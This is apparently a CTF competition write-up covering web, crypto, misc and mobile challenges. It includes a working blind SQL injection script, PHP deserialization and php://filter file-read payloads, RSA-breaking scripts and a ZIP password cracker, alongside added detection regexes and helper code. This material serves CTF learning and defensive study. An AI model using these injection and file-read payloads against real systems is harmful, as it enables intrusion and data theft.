Preface
Only the Web and Misc parts were written by me; the rest was written by my teammates. I'm a scrub, that's all.
Web
Query
Viewing the page source reveals a hint: login.php, which then displays a login page.
Logging in with a universal password (an SQL authentication-bypass payload) returns a visible response: the response says the login succeeded.
Use a script to perform boolean-based blind SQL injection:
import requests
import string

url = "http://d574c221d2a0f4da.node.nsctf.cn/login.php"
s = string.ascii_letters + string.digits  # charset (unused: the loop below walks ASCII 32-127 instead)
flag = ''
for i in range(1, 999):          # i = position of the character being extracted
    print(i)
    for j in range(32, 128):     # j = candidate ASCII value for that position
        # database name
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{i},1))/**/like/**/{j},1,0)#"
        # table name
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'ctf'),{i},1))/**/like/**/{j},1,0)#"
        # column name
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(column_name)frOm/**/information_schema.columns/**/where/**/table_name/**/like/**/'f111'),{i},1))/**/like/**/{j},1,0)#"
        s = f"-1'/**/or/**/if(ord(substr((select/**/group_concat(flagdata)/**/from/**/ctf.f111),{i},1))/**/like/**/{j},1,0)#"
        data = {
            'username': s,
            'password': 1
        }
        r = requests.post(url, data=data)
        if "登录成功" in r.text:   # the "login successful" page means the condition was true
            flag += chr(j)
            print(flag)
            break
    else:
        # no candidate matched at this position: the flag has been fully extracted
        break
Run the script to get the flag.
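From the defender's side, the payload shape above (inline-comment whitespace, a conditional probe on one character, schema enumeration) is easy to flag in request logs. The following detector is an added example, not part of the writeup; the log lines are constructed, and the "method path body" format is an assumption about how a logger records POST bodies.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request log lines (not captured from the challenge server).
SAMPLE_LOG = [
    "POST /login.php username=alice&password=secret",
    "POST /login.php username=-1'/**/or/**/if(ord(substr((select/**/group_concat(flagdata)/**/from/**/ctf.f111),1,1))/**/like/**/102,1,0)%23&password=1",
    "POST /login.php username=bob&password=1'or'1'='1",
    "POST /login.php username=-1'%2F**%2For%2F**%2Fif(ascii(substr((select%2F**%2Fgroup_concat(schema_name)%2F**%2Ffrom%2F**%2Finformation_schema.schemata),3,1))%2F**%2Flike%2F**%2F99,1,0)%23&password=1",
]

# Signatures for the payload shape used in the writeup, matched after URL-decoding.
SIGNATURES = {
    "comment_whitespace": re.compile(r"/\*\*/"),
    "boolean_probe": re.compile(r"\bif\s*\(\s*(ord|ascii)\s*\(\s*substr", re.I),
    "schema_enum": re.compile(r"information_schema\.(schemata|tables|columns)", re.I),
    "tautology": re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I),
}

def normalise(body):
    """URL-decode twice so single- and double-encoded payloads look the same."""
    return unquote_plus(unquote_plus(body))

def classify(line):
    """Return the names of all signatures that match the request body of one log line."""
    parts = line.split(" ", 2)
    body = normalise(parts[2]) if len(parts) == 3 else ""
    return [name for name, rx in SIGNATURES.items() if rx.search(body)]

def scan(lines):
    """(index, matched signatures) for every line that trips at least one signature."""
    hits = []
    for i, line in enumerate(lines):
        matched = classify(line)
        if matched:
            hits.append((i, matched))
    return hits

if __name__ == "__main__":
    for idx, matched in scan(SAMPLE_LOG):
        print(f"line {idx}: {', '.join(matched)}")
```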
Deserialization
Press F12 to get the hint:
<?php
//The location of the flag is at route.php
$read = $_POST["read"];
$input = $_POST["input"];
if(!isset($read) or !isset($input))
{
    die("NONONO!");
}
if(strpos($read, "f14g")===FALSE)
{
    include($read);                  // file chosen by the user (stream wrappers allowed)
    $input = unserialize($input);    // user-controlled object
    $input2 = clone $input;          // clone triggers the object's __clone()
    $input2->position = "route.php";
}
else{
    die("NONONO!");
}
Construct a payload to read the source of route.php:
read=php://filter/read=convert.base64-encode/resource=route.php&input=1
Base64-decoding gives the code:
<h1>Here can you find the position of the flag!</h1>
<?php
$position = "f14g.php";
$gadget = "h1nt.php";
?>
View h1nt.php the same way:
read=php://filter/read=convert.base64-encode/resource=h1nt.php&input=1
Decoding gives:
<?php
class test
{
    public $position;
    public function __clone(){
        echo file_get_contents($this->position);
        return $this->position;
    }
}
?>
Then build the serialized object so that position is set to a payload that reads f14g.php:
<?php
class test
{
    public $position;
    public function __construct($position){
        $this->position = $position;
    }
    public function __clone(){
        echo file_get_contents($this->position);
        return $this->position;
    }
}
// generate the serialized payload locally; the server-side clone does the reading
$input = new test("php://filter/read=convert.base64-encode/resource=f14g.php");
print(serialize($input).PHP_EOL);
Pass the parameters:
read=h1nt.php&input=O:4:"test":1:{s:8:"position";s:57:"php://filter/read=convert.base64-encode/resource=f14g.php";}
Base64-decoding gives the flag.
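The input string above is PHP's serialize() format, where every string is prefixed with its length in bytes (hence s:57 for the filter URL). The serializer below is an added example in Python, not the writeup's code, and exists only to show how that payload is built and why the byte count matters; the PhpObject helper is mine.

```python
class PhpObject:
    """A PHP object with public properties only (private/protected names need \\0 mangling)."""
    def __init__(self, cls, **props):
        self.cls = cls
        self.props = props

def php_serialize(value):
    """Serialize Python values into PHP's serialize() text format."""
    if value is None:
        return "N;"
    if isinstance(value, bool):            # must precede int: bool is an int subclass
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, float):
        return f"d:{value!r};"
    if isinstance(value, str):
        raw = value.encode("utf-8")         # PHP counts bytes, not code points
        return f's:{len(raw)}:"{value}";'
    if isinstance(value, (list, dict)):
        items = value.items() if isinstance(value, dict) else enumerate(value)
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in items)
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, PhpObject):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return f'O:{len(value.cls)}:"{value.cls}":{len(value.props)}:{{{body}}}'
    raise TypeError(f"unsupported type {type(value).__name__}")

def clone_gadget(path):
    """Serialized `test` object whose __clone() (from h1nt.php) will read `path`."""
    return php_serialize(PhpObject("test", position=path))

# The exact string the writeup passes in the `input` parameter.
EXPECTED = ('O:4:"test":1:{s:8:"position";s:57:'
            '"php://filter/read=convert.base64-encode/resource=f14g.php";}')

if __name__ == "__main__":
    print(clone_gadget("php://filter/read=convert.base64-encode/resource=f14g.php"))
```

The underlying fix is the usual one: never unserialize() user-controlled input; use JSON or a signed/allow-listed format instead.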
CodeCheck
F12 gives the hint:
<?php
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
    die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")   // file a must contain exactly "flag"
{
    die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c']) // file b must contain exactly parameter c
{
    die("NONONO");
}
if(isset($_GET['d']))
{
    include($_GET['d']);                        // arbitrary include of parameter d
}
This means the file we pass in a must have the content flag, the file passed in b must have content equal to the parameter c, and then we pass d and use include() to read the file.
GET request:
http://96d9f0fc6195d0b3.node.nsctf.cn/?a=data://text/plain,flag&b=data://text/plain,flag&c=flag&d=php://filter/read=convert.base64-encode/resource=index.php
Base64-decoding gives the flag.
Crypto
secret
e and phi are not coprime; the script solves it directly:
import gmpy2
from Crypto.Util.number import long_to_bytes

p=134261118796789547851478407090640074022214132682000430136383795981942884853000826171189906102866323044078348933419038543719361923320694974970600426450755845839235949167391987970330836004768360774676424958554946699767582105556239177450470656065560178592346659948800891455240736405480828554486592172443394370831
q=147847444534152128997546931602292266094740889347154192420554904651813340915744328104100065373294346723964356736436709934871741161328286944150242733445542228293036404657556168844723521815836689387184856871091025434896710605688594847400051686361372872763001355411405782508020591933546964183881743133374126947753
n=19850163314401552502654477751795889962324360064924594948231168092741951675262933573691070993863763290962945190372400262526595224437463969238332927564085237271719298626877917792595603744433881409963046292095205686879015029586659384866719514948181682427744555313382838805740723664050846950001916332631397606277703888492927635867870538709596993987439225247816137975156657119509372023083507772730332482775258444611462771095896380644997011341265021719189098262072756342069189262188127428079017418048118345180074280858160934483114966968365184788420091050939327341754449300121493187658865378182447547202838325648863844192743
c=13913396366755010607043477552577268277928241319101215381662331498046080625902831202486646020767568921881185124894960242867254162927605416228460108399087406989258037017639619195506711090012877454131383568832750606102901110782045529267940504471322847364808094790662696785470594892244716137203781890284216874035486302506042263453255580475380742959201314003788553692977914357996982118328587119124144181290753389394149235381045389696841471483947310663329993873046123134587149661347999774958105091103806375702387084149309542351541021140111048408248121408401601979108510758891595550054699719801708646232427198902271953673874
e=28
n = p * q
phi = (p - 1) * (q - 1)
t = gmpy2.gcd(e,phi)          # the common factor of e and phi
t1 = e // t                   # the part of e that is invertible mod phi
dt1 = gmpy2.invert(t1,phi)
mt1 = pow(c,dt1,n)            # equals m^t mod n
s,m = gmpy2.iroot(mt1,t)      # exact t-th root (works because m^t < n)
print(long_to_bytes(s))
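The same technique on small constructed parameters, as an added example (not the challenge's values or script): with t = gcd(e, phi) and e = t * t1, c^(t1^-1 mod phi) equals m^t mod n, and m is recovered by an exact t-th root, which only succeeds when m^t < n. The primes and e = 20 are my choices so that gcd(e, phi) = 4; the pure-Python iroot replaces gmpy2.iroot so the example has no dependencies.

```python
from math import gcd

# Constructed parameters: two well-known primes and an e sharing the factor 4 with phi.
P, Q = 1000000007, 1000000009
E = 20

def iroot(x, k):
    """Integer k-th root by Newton iteration: returns (floor(x ** (1/k)), is_exact)."""
    if x < 2:
        return x, True
    r = 1 << ((x.bit_length() + k - 1) // k)      # upper bound: r^k >= x
    while True:
        nr = ((k - 1) * r + x // r ** (k - 1)) // k
        if nr >= r:
            break
        r = nr
    return r, r ** k == x

def decrypt_noncoprime(c, e, p, q):
    """Decrypt when gcd(e, phi) = t > 1. Returns (candidate m, whether the root was exact)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    t = gcd(e, phi)
    t1 = e // t
    if gcd(t1, phi) != 1:
        raise ValueError("e / gcd(e, phi) still shares a factor with phi")
    d = pow(t1, -1, phi)          # inverse of the invertible part only
    mt = pow(c, d, n)             # == m^t mod n
    root, exact = iroot(mt, t)
    return root, exact

def demo(m):
    """Encrypt m with the constructed key and try to recover it."""
    c = pow(m, E, P * Q)
    return decrypt_noncoprime(c, E, P, Q)

if __name__ == "__main__":
    print(demo(12345))   # short message: m^4 < n, exact root
    print(demo(65536))   # 2^64 > n: the root is not exact, recovery fails
```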
Morse's notebook
secret.txt contains a sentence; extract only the punctuation marks:
。,,。!。,!。。。!。。。!。,,!,,,!。,。!,。。!。。!。。。!,。,。!,,,!,。!,,。!。,。!。,!,!。。。
Guessing it is Morse code, decode it with an online site:
PASSWORDISCONGRATS
Guessing a Vigenère cipher, decrypt the ciphertext supplied in the attachment; testing shows the key is congrats.
ciphey recovers the flag.
RSA
Factor n-1 directly with an online site to get g:
2 * 1346104232461691 * 13570850594633462506426369052182298554140635599543685835372377476383038708650421475723391142118956001358520246769650699398490037618758005241062608387057439283872260149565854577827352267289963736282502923131251179400580891491236925451166755184695335564693793568286112036468975877609637392241679
Decrypt with the script:
from Crypto.Util.number import inverse, long_to_bytes
g = 1346104232461691
n = 36535558847082719901201561031181835346574576610950713924924272947759193576365817762980927638691696601293089537315055413746788190208875234794229119049056299551864869870291634941246362436491006904347559559494705922259007299126640817275929491680601926404543198957206717290905220235571289759182878331893962038379
c = 532997872940452282189043430008002793694788439822465302532208754231005799057972378308576109082463996551992533174546386979606697890310597738637156771564229
a = 2694858406312563434474553988904403597551484373358339092528913028454100111881368126493990657117571672510331411186745639563619323775673115439
e = 65537
d = inverse(e, (a - 1) * (g - 1))
plaintext = pow(c, d, a * g)
decrypted_message = long_to_bytes(plaintext)
print("Decrypted message:", decrypted_message.decode())
The flag is obtained:
Decrypted message: flag{p01la4d_rHo_a1gOr1thM_r1gh4}
Misc
ZIP
The attachment is an archive that needs a password to open, but there is a hint:
The art of 0 and 1, and it will remain shorter than 9.
This means the password consists only of 0 and 1 and has no more than 9 digits.
Generate a dictionary with a wordlist generator, then run a dictionary attack against the archive.
The cracked password yields the flag.
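The dictionary and the attack against the archive, as an added example (not the writeup's tool). It generates every 0/1 string of length 1 to 9 (1022 candidates) and tries them with the standard library; the archive path is a placeholder, and only ZipCrypto archives are supported because zipfile cannot open AES-encrypted entries.

```python
import itertools
import zipfile
import zlib

def binary_wordlist(max_len=9):
    """Every string over {0,1} of length 1..max_len: 2 + 4 + ... + 2**max_len words."""
    for length in range(1, max_len + 1):
        for bits in itertools.product("01", repeat=length):
            yield "".join(bits)

def crack_zip(path, candidates):
    """Return the first candidate that decrypts the first entry of the archive, else None."""
    with zipfile.ZipFile(path) as zf:
        name = zf.namelist()[0]
        for pwd in candidates:
            try:
                with zf.open(name, pwd=pwd.encode()) as f:
                    f.read()          # read to EOF so the CRC is verified, not just the check byte
                return pwd
            except (RuntimeError, zipfile.BadZipFile, zlib.error):
                # wrong password (RuntimeError), or the 1/256 check-byte false positive
                # that then fails on CRC or inflate
                continue
    return None

if __name__ == "__main__":
    words = list(binary_wordlist())
    print(len(words), "candidates")
    print(crack_zip("PLACEHOLDER_attachment.zip", words))   # placeholder path, not the real file
```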
SimpleDocument
Opening the file in 010 Editor reveals a PDF file header.
Carve the file out manually and save it as a PDF.
The PDF shows nothing, so convert it to a Word document and change the font colour to get the flag.
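The manual carving step can be scripted by searching for the %PDF- header and the last %%EOF trailer. This is an added example, not the writeup's procedure; the sample blob is constructed.

```python
PDF_MAGIC = b"%PDF-"
PDF_EOF = b"%%EOF"

def carve_pdf(blob):
    """Return the bytes from the first %PDF- header through the last %%EOF (plus its newline),
    or None when no complete PDF is embedded in the blob."""
    start = blob.find(PDF_MAGIC)
    if start == -1:
        return None
    end = blob.rfind(PDF_EOF)          # last trailer: incremental updates add several %%EOF
    if end == -1 or end < start:
        return None
    end += len(PDF_EOF)
    while end < len(blob) and blob[end:end + 1] in (b"\r", b"\n"):
        end += 1                       # keep the line ending that follows %%EOF
    return blob[start:end]

def carve_to_file(src, dst):
    """Carve the PDF from `src` into `dst`; returns the number of bytes written (0 if none)."""
    with open(src, "rb") as f:
        pdf = carve_pdf(f.read())
    if pdf is None:
        return 0
    with open(dst, "wb") as f:
        f.write(pdf)
    return len(pdf)

# Constructed sample: junk prefix, a minimal PDF skeleton, trailing junk.
SAMPLE = (b"\x00JUNKHEADER\x00"
          b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
          b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
          b"\xff\xfe trailing garbage")

if __name__ == "__main__":
    print(carve_pdf(SAMPLE))
```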
Mobile
peacock
1. The main logic is in test; test loads the test library.
2. Find libtest.so under lib and open it with IDA.
The Strings window shows base64-encoded ciphertext and a table.